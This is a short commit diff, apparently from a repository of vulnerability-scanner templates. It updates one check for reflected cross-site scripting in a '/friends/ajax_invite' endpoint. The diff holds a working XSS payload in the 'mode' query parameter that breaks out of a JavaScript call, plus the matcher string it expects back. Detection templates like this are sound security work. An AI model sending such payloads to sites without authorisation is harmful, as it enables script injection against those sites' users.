minor update
parent
3456d3574f
commit
75c4277fb9
|
@ -32,14 +32,14 @@ info:
|
|||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/friends/ajax_invite?mode=model%27)%3balert(1)%2f%2f;'"
|
||||
- "{{BaseURL}}/friends/ajax_invite?mode=model%27)%3balert(document.domain)%2f%2f;'"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "initInviteFriendBtn('model');alert(1)//;"
|
||||
- "initInviteFriendBtn('model');alert(document.domain)//;"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
|
|
Loading…
Reference in New Issue